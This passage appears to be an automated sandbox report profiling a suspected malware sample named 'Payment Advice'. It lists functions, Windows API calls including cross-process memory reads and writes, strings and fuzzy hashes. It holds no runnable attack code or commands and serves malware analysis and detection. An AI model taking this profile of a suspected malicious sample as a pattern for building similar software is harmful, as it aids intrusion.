Instruction Fuzzy Hash: 85515935A0C20296CF157718C9563BE3F95FF83718F248D6AF4D5822A9EF348D98DA42

Function 005C4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0061DC50,?,0000000F,0000000C,00000016,0061DC50,?), ref: 005C4645

Part of subcall function 0058936C: __swprintf.LIBCMT ref: 005893AB
Part of subcall function 0058936C: __itow.LIBCMT ref: 005893DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 005C46C5

Strings

REMOVE, xrefs: 005C4676
THIS, xrefs: 005C4703

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: a859093f16e914c72400eb1db45e52cea5c6826ab723deb81805ba577b956b3e
Instruction ID: 28245f2597964d85674acf15cd924396a28a7113cde6b1d9d75677373a0f0c04
Opcode Fuzzy Hash: a859093f16e914c72400eb1db45e52cea5c6826ab723deb81805ba577b956b3e
Instruction Fuzzy Hash: 43416D34A0025A9FCF01EFA4C895EADBBF5FF89304F148459E916AB292DB349D46CF50

Function 005BC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005C430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005BBC08,?,?,00000034,00000800,?,00000034), ref: 005C4335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 005BC1D3

Part of subcall function 005C42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005BBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 005C4300

Part of subcall function 005C422F: GetWindowThreadProcessId.USER32(?,?), ref: 005C425A
Part of subcall function 005C422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,005BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 005C426A
Part of subcall function 005C422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,005BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 005C4280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005BC240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005BC28D

Strings

@, xrefs: 005BC2A5

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: c9a41e54831553e959b70ea8c421718975c0277fd5ae2fca867ce96d52fd3929
Instruction ID: 4b3a30953e78fead2cebc89b2ae8e48ed981af19e9a82fc85f90b8e3a52c151b
Opcode Fuzzy Hash: c9a41e54831553e959b70ea8c421718975c0277fd5ae2fca867ce96d52fd3929
Instruction Fuzzy Hash: 99413B76900219AFDB10DFA4CC96FEEBBB8BB49700F004099FA85B7181DA716E45CB61

Function 005EA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0061DC00,00000000,?,?,?,?), ref: 005EA6D8
GetWindowLongW.USER32 ref: 005EA6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 005EA705

Strings

SysTreeView32, xrefs: 005EA6AA

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 3ac72eaa9b53e2117eeb7624beae37aa09c799b1c565c2529b94cfeb754e11fc
Instruction ID: 8aac33fa7baf3de205325270d88fc27d67c41bfc1971620a69df76b59e93ddd0
Opcode Fuzzy Hash: 3ac72eaa9b53e2117eeb7624beae37aa09c799b1c565c2529b94cfeb754e11fc
Instruction Fuzzy Hash: 4231BE31640246ABDF158F79CC45BEA7BAAFB89364F254715F8B5931E0C730E8509B90

Function 005D5180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005D5190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 005D51C6

Strings

D], xrefs: 005D522E
|, xrefs: 005D51B5

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$D]
API String ID: 1413715105-2303059656
Opcode ID: a8f38fc227672a5c3155bf912a8ab7812d6853c60732839404cad26e46bcc5ed
Instruction ID: 6cde83e2cca6e65cf9ac7d217a2f8f672a56ef7e51a4eb7a3d7a143d0e7b01b9
Opcode Fuzzy Hash: a8f38fc227672a5c3155bf912a8ab7812d6853c60732839404cad26e46bcc5ed
Instruction Fuzzy Hash: 93311A7580011AABCF11AFA4CC45AEE7FB9FF54750F100056E815B6266EA31AA06DB60

Function 005EA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 005EA15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 005EA172
SendMessageW.USER32(?,00001002,00000000,?), ref: 005EA196

Strings

SysMonthCal32, xrefs: 005EA129

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: fa9ad1b247bd240648779cf09bd127ca97bd2fdc45c0b2a8be63600238fa19fe
Instruction ID: 9a9b63c1a75cb1048f5288e251470e8f947e862a42129be5c8e649362bd5714b
Opcode Fuzzy Hash: fa9ad1b247bd240648779cf09bd127ca97bd2fdc45c0b2a8be63600238fa19fe
Instruction Fuzzy Hash: 1A218D32510218ABDF198FA4CC86FEA3B7AFF48754F110214FA956B1D0D7B5B851CBA0

Function 005EA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 005EA941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 005EA94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 005EA956

Strings

msctls_updown32, xrefs: 005EA8BB

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 10da4b0cf77caf08e30f4b9699cca612950618a7958b688b027506d4e8abc607
Instruction ID: 61420072bcb2b86edc59460f44b15bc8f0c397506418436ffcc7bb5751e38d7c
Opcode Fuzzy Hash: 10da4b0cf77caf08e30f4b9699cca612950618a7958b688b027506d4e8abc607
Instruction Fuzzy Hash: CA21A1B5200209AFDB04DF29CC91D773BADFB4A394B050059FA449B262CA31EC118B71

Function 005E99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 005E9A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 005E9A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 005E9A65

Strings

Listbox, xrefs: 005E99FD

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 639e3483ea39290d30d07a30d10ac94bc3a544f61adb75e2545fcce685376698
Instruction ID: 11f0e8312a58bef6f9ae9d2b425ffa864927c1f41660d888b500f42e3243c23b
Opcode Fuzzy Hash: 639e3483ea39290d30d07a30d10ac94bc3a544f61adb75e2545fcce685376698
Instruction Fuzzy Hash: B021C272650158BFDF258F55CC85EBB3BAAFF89750F018129F9849B1A0C6719C5187A0

Function 005A2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,005A2350,?), ref: 005A22A1
GetProcAddress.KERNEL32(00000000), ref: 005A22A8

Strings

RoInitialize, xrefs: 005A2290
combase.dll, xrefs: 005A229C

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: dc5ff1526d75ba989d0f0174324e3f9d381f7d49a63f9d7b02aaf835823726fd
Instruction ID: 16703887494d9c85d023c8dbb75a16477b56e50eeb1beba3b52ac9a81da08d0d
Opcode Fuzzy Hash: dc5ff1526d75ba989d0f0174324e3f9d381f7d49a63f9d7b02aaf835823726fd
Instruction Fuzzy Hash: 47E04F786E0310ABFB205FF4ED4EB1A3A67BB0A706F006120F242D60E0DBB44040DF04

Function 005A235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,005A2276), ref: 005A2376
GetProcAddress.KERNEL32(00000000), ref: 005A237D

Strings

RoUninitialize, xrefs: 005A2365
combase.dll, xrefs: 005A2371

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: f12cfe1596f2a0f78ad86f12dc477708638fdb501d89c45585c56cc783afad71
Instruction ID: d2035bf992accd067f7e271d2d778975ed72e76f5aeeb132d2f52968f3672aed
Opcode Fuzzy Hash: f12cfe1596f2a0f78ad86f12dc477708638fdb501d89c45585c56cc783afad71
Instruction Fuzzy Hash: 1DE0B674684310ABEB24AFE0ED0EB0A3A67B71670AF112514F249D20B0CBB994009B14

Function 005FAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 005FAC60
__swprintf.LIBCMT ref: 005FAC94

Strings

WIN_XPe, xrefs: 005FACD3
%.3d, xrefs: 005FAC6E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 3e3761caec65d403371ac0a039977d57067d80c28126270b1d2ea86527f0daca
Instruction ID: 0752878df97f85b06ae4e0d17612d505e9e80007df5e46dc44cd6c1525ea6a09
Opcode Fuzzy Hash: 3e3761caec65d403371ac0a039977d57067d80c28126270b1d2ea86527f0daca
Instruction Fuzzy Hash: 40E012F180465CDBCB11A790CD05DFABB7DB704741F100892FB0AA1004D6399F84AA23

Function 005E2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,005E21FB,?,005E23EF), ref: 005E2213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 005E2225

Strings

GetProcessId, xrefs: 005E221F
kernel32.dll, xrefs: 005E220E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 5c117fbd3d921c2d29f178a9ed58ee8af9815cbe310534690bf3773a43622fcf
Instruction ID: be8391fb32db2ea078bfcd343236d544ee8eb2b1cd58447c7939022cbffe15aa
Opcode Fuzzy Hash: 5c117fbd3d921c2d29f178a9ed58ee8af9815cbe310534690bf3773a43622fcf
Instruction Fuzzy Hash: 91D0A7798407139FC7255F71F808602BADAFB08311F016459E881E2150DFB0D8808AA0

Function 005842F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,005842EC,?,005842AA,?), ref: 00584304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00584316

Strings

Wow64RevertWow64FsRedirection, xrefs: 00584310
kernel32.dll, xrefs: 005842FF

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: b711807941b5f3fe050ac86b7790f960dfbdefe94ee30899932adee07c962e39
Instruction ID: 20bc672a418a6468e6e8e0581cf3d801266f6bb73ffdf0a419c6c6514dbba78f
Opcode Fuzzy Hash: b711807941b5f3fe050ac86b7790f960dfbdefe94ee30899932adee07c962e39
Instruction Fuzzy Hash: 72D0C7715447139FD7207F65E80D6427AD5FB14711F115959FD55E2264EFB0C8C08B90

Function 0058434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,005841BB,00584341,?,0058422F,?,005841BB,?,?,?,?,005839FE,?,00000001), ref: 00584359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0058436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 00584365
kernel32.dll, xrefs: 00584354

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: e97ef6da3095d572bfed01778f32d3fc2f0ec2a62cd7443f9223dd028ef21751
Instruction ID: 3e75aba927620cb39a25819289aeafcca9d383ccbbbb81fadda3e9e91517b9c3
Opcode Fuzzy Hash: e97ef6da3095d572bfed01778f32d3fc2f0ec2a62cd7443f9223dd028ef21751
Instruction Fuzzy Hash: 0DD0C7715447139FD7206FB5E8096437AD5BB14715F115969EC95E2250EFB0D8C08B90

Function 005C0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,005C052F,?,005C06D7), ref: 005C0572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 005C0584

Strings

oleaut32.dll, xrefs: 005C056D
UnRegisterTypeLibForUser, xrefs: 005C057E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 8f5587e4144a76b1081d0be0d1587c9d6335c7370e85b58168884f8eece42414
Instruction ID: f0786dc43ad17b02ded2858b152888a8a0328d4d79b8955f58095297ee59890d
Opcode Fuzzy Hash: 8f5587e4144a76b1081d0be0d1587c9d6335c7370e85b58168884f8eece42414
Instruction Fuzzy Hash: D1D09E705847129FDB205FA5A818B42BBE5AB04711F11965DE85592190DAB0D4808AA0

Function 005C0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,005C051D,?,005C05FE), ref: 005C0547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 005C0559

Strings

oleaut32.dll, xrefs: 005C0542
RegisterTypeLibForUser, xrefs: 005C0553

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: e4675ada2d801bce1b0bc905b0a9d96eb43c3eb5ddf3d31b133a7999ba69e5a5
Instruction ID: 5a3fb4273aa20ad71374927d6b6d276d91f2a06c1ecf5e1c8f368c032cd808ff
Opcode Fuzzy Hash: e4675ada2d801bce1b0bc905b0a9d96eb43c3eb5ddf3d31b133a7999ba69e5a5
Instruction Fuzzy Hash: A7D0C770584713DFD7209FA5E818B42BAE5FB14711F11D55DE556D2290DAB0C8808A90

Function 005DECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,005DECBE,?,005DEBBB), ref: 005DECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 005DECE8

Strings

GetSystemWow64DirectoryW, xrefs: 005DECE2
kernel32.dll, xrefs: 005DECD1

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 2754b23772d9ba843872e45621e2d84c20dc9e96084ee5fa34d4ee721ef0055d
Instruction ID: e882227272618aab7a6689e8dd5b7eb161a0992f2966ddfb54252566de6abef5
Opcode Fuzzy Hash: 2754b23772d9ba843872e45621e2d84c20dc9e96084ee5fa34d4ee721ef0055d
Instruction Fuzzy Hash: FED0A7704507239FCB306FA4E849603BAF5FB04300F01846BF845D2261DFB0DC808790

Function 005DBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,005DBAD3,00000001,005DB6EE,?,0061DC00), ref: 005DBAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 005DBAFD

Strings

GetModuleHandleExW, xrefs: 005DBAF7
kernel32.dll, xrefs: 005DBAE6

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: b18e00d3f44e9c656f8c771efd9e9bc1f914819dfbd0168fe385df7b2640635e
Instruction ID: a0328e790a638db3d5aa61dec6923cceca4398feb91c259107a3a4a5e055efd1
Opcode Fuzzy Hash: b18e00d3f44e9c656f8c771efd9e9bc1f914819dfbd0168fe385df7b2640635e
Instruction Fuzzy Hash: 40D0A770940713DFE7305F64E849B16BAD6FB05300F02445BE843D2250DFB0D8C0C690

Function 005E3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,005E3BD1,?,005E3E06), ref: 005E3BE9
